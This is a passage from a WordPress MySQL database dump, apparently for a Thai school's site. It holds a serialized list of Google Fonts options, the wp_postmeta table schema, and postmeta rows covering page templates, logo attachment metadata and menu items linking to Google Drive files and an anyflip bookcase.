One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Texturina\";a:3:{s:5:\"label\";s:9:\"Texturina\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Thasadith\";a:3:{s:5:\"label\";s:9:\"Thasadith\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:18:\"The Girl Next Door\";a:3:{s:5:\"label\";s:18:\"The Girl Next Door\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:12:\"The Nautigal\";a:3:{s:5:\"label\";s:12:\"The Nautigal\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Tienne\";a:3:{s:5:\"label\";s:6:\"Tienne\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"900\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Tillana\";a:3:{s:5:\"label\";s:7:\"Tillana\";s:8:\"variants\";a:5:{i:0;s:3:\"500\";i:1;s:3:\"600\";i:2;s:3:\"700\";i:3;s:3:\"800\";i:4;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:7:\"Timmana\";a:3:{s:5:\"label\";s:7:\"Timmana\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Tinos\";a:3:{s:5:\"label\";s:5:\"Tinos\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Titan One\";a:3:{s:5:\"label\";s:9:\"Titan One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"Titillium Web\";a:3:{s:5:\"label\";s:13:\"Titillium Web\";s:8:\"variants\";a:11:{i:0;s:3:\"200\";i:1;s:9:\"200italic\";i:2;s:3:\"300\";i:3;s:9:\"300italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:3:\"900\";i:9;s:6:\"italic\";i:10;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Tomorrow\";a:3:{s:5:\"label\";s:8:\"Tomorrow\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Tourney\";a:3:{s:5:\"label\";s:7:\"Tourney\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Trade Winds\";a:3:{s:5:\"label\";s:11:\"Trade Winds\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Train One\";a:3:{s:5:\"label\";s:9:\"Train One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Trirong\";a:3:{s:5:\"label\";s:7:\"Trirong\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Trispace\";a:3:{s:5:\"label\";s:8:\"Trispace\";s:8:\"variants\";a:8:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Trocchi\";a:3:{s:5:\"label\";s:7:\"Trocchi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:7:\"Trochut\";a:3:{s:5:\"label\";s:7:\"Trochut\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:6:\"italic\";i:2;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Truculenta\";a:3:{s:5:\"label\";s:10:\"Truculenta\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:7:\"Trykker\";a:3:{s:5:\"label\";s:7:\"Trykker\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Tulpen One\";a:3:{s:5:\"label\";s:10:\"Tulpen One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:11:\"Turret Road\";a:3:{s:5:\"label\";s:11:\"Turret Road\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"800\";i:5;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Twinkle Star\";a:3:{s:5:\"label\";s:12:\"Twinkle Star\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Ubuntu\";a:3:{s:5:\"label\";s:6:\"Ubuntu\";s:8:\"variants\";a:8:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:6:\"italic\";i:7;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:16:\"Ubuntu Condensed\";a:3:{s:5:\"label\";s:16:\"Ubuntu Condensed\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Ubuntu Mono\";a:3:{s:5:\"label\";s:11:\"Ubuntu Mono\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:5:\"Uchen\";a:3:{s:5:\"label\";s:5:\"Uchen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:5:\"Ultra\";a:3:{s:5:\"label\";s:5:\"Ultra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:14:\"Uncial Antiqua\";a:3:{s:5:\"label\";s:14:\"Uncial Antiqua\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:8:\"Underdog\";a:3:{s:5:\"label\";s:8:\"Underdog\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Unica One\";a:3:{s:5:\"label\";s:9:\"Unica One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:14:\"UnifrakturCook\";a:3:{s:5:\"label\";s:14:\"UnifrakturCook\";s:8:\"variants\";a:1:{i:0;s:3:\"700\";}s:8:\"category\";s:7:\"display\";}s:18:\"UnifrakturMaguntia\";a:3:{s:5:\"label\";s:18:\"UnifrakturMaguntia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Unkempt\";a:3:{s:5:\"label\";s:7:\"Unkempt\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Unlock\";a:3:{s:5:\"label\";s:6:\"Unlock\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:4:\"Unna\";a:3:{s:5:\"label\";s:4:\"Unna\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Urbanist\";a:3:{s:5:\"label\";s:8:\"Urbanist\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"VT323\";a:3:{s:5:\"label\";s:5:\"VT323\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:11:\"Vampiro One\";a:3:{s:5:\"label\";s:11:\"Vampiro One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Varela\";a:3:{s:5:\"label\";s:6:\"Varela\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"Varela Round\";a:3:{s:5:\"label\";s:12:\"Varela Round\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Varta\";a:3:{s:5:\"label\";s:5:\"Varta\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Vast Shadow\";a:3:{s:5:\"label\";s:11:\"Vast Shadow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:12:\"Vesper Libre\";a:3:{s:5:\"label\";s:12:\"Vesper Libre\";s:8:\"variants\";a:4:{i:0;s:3:\"500\";i:1;s:3:\"700\";i:2;s:3:\"900\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:12:\"Viaoda Libre\";a:3:{s:5:\"label\";s:12:\"Viaoda Libre\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Vibes\";a:3:{s:5:\"label\";s:5:\"Vibes\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:5:\"Vibur\";a:3:{s:5:\"label\";s:5:\"Vibur\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Vidaloka\";a:3:{s:5:\"label\";s:8:\"Vidaloka\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:4:\"Viga\";a:3:{s:5:\"label\";s:4:\"Viga\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:5:\"Voces\";a:3:{s:5:\"label\";s:5:\"Voces\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:7:\"Volkhov\";a:3:{s:5:\"label\";s:7:\"Volkhov\";s:8:\"variants\";a:4:{i:0;s:3:\"700\";i:1;s:9:\"700italic\";i:2;s:6:\"italic\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Vollkorn\";a:3:{s:5:\"label\";s:8:\"Vollkorn\";s:8:\"variants\";a:12:{i:0;s:3:\"500\";i:1;s:9:\"500italic\";i:2;s:3:\"600\";i:3;s:9:\"600italic\";i:4;s:3:\"700\";i:5;s:9:\"700italic\";i:6;s:3:\"800\";i:7;s:9:\"800italic\";i:8;s:3:\"900\";i:9;s:9:\"900italic\";i:10;s:6:\"italic\";i:11;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Vollkorn SC\";a:3:{s:5:\"label\";s:11:\"Vollkorn SC\";s:8:\"variants\";a:4:{i:0;s:3:\"600\";i:1;s:3:\"700\";i:2;s:3:\"900\";i:3;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Voltaire\";a:3:{s:5:\"label\";s:8:\"Voltaire\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:15:\"Vujahday Script\";a:3:{s:5:\"label\";s:15:\"Vujahday Script\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:23:\"Waiting for the Sunrise\";a:3:{s:5:\"label\";s:23:\"Waiting for the Sunrise\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Wallpoet\";a:3:{s:5:\"label\";s:8:\"Wallpoet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Walter Turncoat\";a:3:{s:5:\"label\";s:15:\"Walter Turncoat\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Warnes\";a:3:{s:5:\"label\";s:6:\"Warnes\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Waterfall\";a:3:{s:5:\"label\";s:9:\"Waterfall\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Wellfleet\";a:3:{s:5:\"label\";s:9:\"Wellfleet\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:9:\"Wendy One\";a:3:{s:5:\"label\";s:9:\"Wendy One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"WindSong\";a:3:{s:5:\"label\";s:8:\"WindSong\";s:8:\"variants\";a:2:{i:0;s:3:\"500\";i:1;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Wire One\";a:3:{s:5:\"label\";s:8:\"Wire One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Work Sans\";a:3:{s:5:\"label\";s:9:\"Work Sans\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:9:\"100italic\";i:2;s:3:\"200\";i:3;s:9:\"200italic\";i:4;s:3:\"300\";i:5;s:9:\"300italic\";i:6;s:3:\"500\";i:7;s:9:\"500italic\";i:8;s:3:\"600\";i:9;s:9:\"600italic\";i:10;s:3:\"700\";i:11;s:9:\"700italic\";i:12;s:3:\"800\";i:13;s:9:\"800italic\";i:14;s:3:\"900\";i:15;s:9:\"900italic\";i:16;s:6:\"italic\";i:17;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Xanh Mono\";a:3:{s:5:\"label\";s:9:\"Xanh Mono\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:9:\"monospace\";}s:7:\"Yaldevi\";a:3:{s:5:\"label\";s:7:\"Yaldevi\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:17:\"Yanone Kaffeesatz\";a:3:{s:5:\"label\";s:17:\"Yanone Kaffeesatz\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:11:\"Yantramanav\";a:3:{s:5:\"label\";s:11:\"Yantramanav\";s:8:\"variants\";a:6:{i:0;s:3:\"100\";i:1;s:3:\"300\";i:2;s:3:\"500\";i:3;s:3:\"700\";i:4;s:3:\"900\";i:5;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:9:\"Yatra One\";a:3:{s:5:\"label\";s:9:\"Yatra One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Yellowtail\";a:3:{s:5:\"label\";s:10:\"Yellowtail\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:9:\"Yeon Sung\";a:3:{s:5:\"label\";s:9:\"Yeon Sung\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Yeseva One\";a:3:{s:5:\"label\";s:10:\"Yeseva One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:10:\"Yesteryear\";a:3:{s:5:\"label\";s:10:\"Yesteryear\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:6:\"Yomogi\";a:3:{s:5:\"label\";s:6:\"Yomogi\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:4:\"Yrsa\";a:3:{s:5:\"label\";s:4:\"Yrsa\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:9:\"Yuji Boku\";a:3:{s:5:\"label\";s:9:\"Yuji Boku\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:21:\"Yuji Hentaigana Akari\";a:3:{s:5:\"label\";s:21:\"Yuji Hentaigana Akari\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:23:\"Yuji Hentaigana Akebono\";a:3:{s:5:\"label\";s:23:\"Yuji Hentaigana Akebono\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:8:\"Yuji Mai\";a:3:{s:5:\"label\";s:8:\"Yuji Mai\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:10:\"Yuji Syuku\";a:3:{s:5:\"label\";s:10:\"Yuji Syuku\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Yusei Magic\";a:3:{s:5:\"label\";s:11:\"Yusei Magic\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:12:\"ZCOOL KuaiLe\";a:3:{s:5:\"label\";s:12:\"ZCOOL KuaiLe\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:21:\"ZCOOL QingKe HuangYou\";a:3:{s:5:\"label\";s:21:\"ZCOOL QingKe HuangYou\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:13:\"ZCOOL XiaoWei\";a:3:{s:5:\"label\";s:13:\"ZCOOL XiaoWei\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:11:\"Zen Antique\";a:3:{s:5:\"label\";s:11:\"Zen Antique\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:16:\"Zen Antique Soft\";a:3:{s:5:\"label\";s:16:\"Zen Antique Soft\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:8:\"Zen Dots\";a:3:{s:5:\"label\";s:8:\"Zen Dots\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:23:\"Zen Kaku Gothic Antique\";a:3:{s:5:\"label\";s:23:\"Zen Kaku Gothic Antique\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"700\";i:3;s:3:\"900\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:19:\"Zen Kaku Gothic New\";a:3:{s:5:\"label\";s:19:\"Zen Kaku Gothic New\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"700\";i:3;s:3:\"900\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:13:\"Zen Kurenaido\";a:3:{s:5:\"label\";s:13:\"Zen Kurenaido\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:8:\"Zen Loop\";a:3:{s:5:\"label\";s:8:\"Zen Loop\";s:8:\"variants\";a:2:{i:0;s:6:\"italic\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:15:\"Zen Maru Gothic\";a:3:{s:5:\"label\";s:15:\"Zen Maru Gothic\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:3:\"500\";i:2;s:3:\"700\";i:3;s:3:\"900\";i:4;s:7:\"regular\";}s:8:\"category\";s:10:\"sans-serif\";}s:14:\"Zen Old Mincho\";a:3:{s:5:\"label\";s:14:\"Zen Old Mincho\";s:8:\"variants\";a:3:{i:0;s:3:\"700\";i:1;s:3:\"900\";i:2;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:13:\"Zen Tokyo Zoo\";a:3:{s:5:\"label\";s:13:\"Zen Tokyo Zoo\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}s:6:\"Zeyada\";a:3:{s:5:\"label\";s:6:\"Zeyada\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:13:\"Zhi Mang Xing\";a:3:{s:5:\"label\";s:13:\"Zhi Mang Xing\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:8:\"category\";s:11:\"handwriting\";}s:10:\"Zilla Slab\";a:3:{s:5:\"label\";s:10:\"Zilla Slab\";s:8:\"variants\";a:10:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:3:\"500\";i:3;s:9:\"500italic\";i:4;s:3:\"600\";i:5;s:9:\"600italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";i:8;s:6:\"italic\";i:9;s:7:\"regular\";}s:8:\"category\";s:5:\"serif\";}s:20:\"Zilla Slab Highlight\";a:3:{s:5:\"label\";s:20:\"Zilla Slab Highlight\";s:8:\"variants\";a:2:{i:0;s:3:\"700\";i:1;s:7:\"regular\";}s:8:\"category\";s:7:\"display\";}}','off'),
(1172681,'_site_transient_timeout_wp_theme_files_patterns-20701103eda1becec3b065636ab6b663','1775221417','off'),
(1172682,'_site_transient_wp_theme_files_patterns-20701103eda1becec3b065636ab6b663','a:2:{s:7:\"version\";s:5:\"2.5.9\";s:8:\"patterns\";a:0:{}}','off');
/*!40000 ALTER TABLE `wp_options` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_postmeta`
--

DROP TABLE IF EXISTS `wp_postmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_postmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `post_id` (`post_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=2482 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_postmeta`
--

LOCK TABLES `wp_postmeta` WRITE;
/*!40000 ALTER TABLE `wp_postmeta` DISABLE KEYS */;
INSERT INTO `wp_postmeta` VALUES
(1,2,'_wp_page_template','default'),
(2,3,'_wp_page_template','default'),
(11,13,'_wp_attached_file','2024/07/โลโก้โรงเรียน.png'),
(12,13,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:225;s:6:\"height\";i:225;s:4:\"file\";s:51:\"2024/07/โลโก้โรงเรียน.png\";s:8:\"filesize\";i:36748;s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:51:\"โลโก้โรงเรียน-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19172;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:51:\"โลโก้โรงเรียน-225x189.png\";s:5:\"width\";i:225;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:33464;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(21,19,'_edit_lock','1763010005:1'),
(22,19,'_edit_last','1'),
(23,19,'title_style','default'),
(24,19,'_title_style','field_5d1a0217cf408'),
(25,20,'title_style','default'),
(26,20,'_title_style','field_5d1a0217cf408'),
(35,26,'_menu_item_type','post_type'),
(36,26,'_menu_item_menu_item_parent','0'),
(37,26,'_menu_item_object_id','19'),
(38,26,'_menu_item_object','page'),
(39,26,'_menu_item_target',''),
(40,26,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(41,26,'_menu_item_xfn',''),
(42,26,'_menu_item_url',''),
(59,35,'_menu_item_type','custom'),
(60,35,'_menu_item_menu_item_parent','0'),
(61,35,'_menu_item_object_id','35'),
(62,35,'_menu_item_object','custom'),
(63,35,'_menu_item_target',''),
(64,35,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(65,35,'_menu_item_xfn',''),
(66,35,'_menu_item_url','https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=drive_link'),
(68,36,'_menu_item_type','custom'),
(69,36,'_menu_item_menu_item_parent','0'),
(70,36,'_menu_item_object_id','36'),
(71,36,'_menu_item_object','custom'),
(72,36,'_menu_item_target',''),
(73,36,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(74,36,'_menu_item_xfn',''),
(75,36,'_menu_item_url','https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing'),
(77,37,'_menu_item_type','custom'),
(78,37,'_menu_item_menu_item_parent','0'),
(79,37,'_menu_item_object_id','37'),
(80,37,'_menu_item_object','custom'),
(81,37,'_menu_item_target',''),
(82,37,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
(83,37,'_menu_item_xfn',''),
(84,37,'_menu_item_url','https://anyflip.com/bookcase/giwjy'),
(86,38,'_menu_item_type','custom'),
(87,38,'_menu_item_menu_item_parent','0'),
(88,38,'_menu_item_object_id','38'),
(89,38,'_menu_item_object','custom'),
(90,38,'_menu_item_target',''),
(91,38,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),
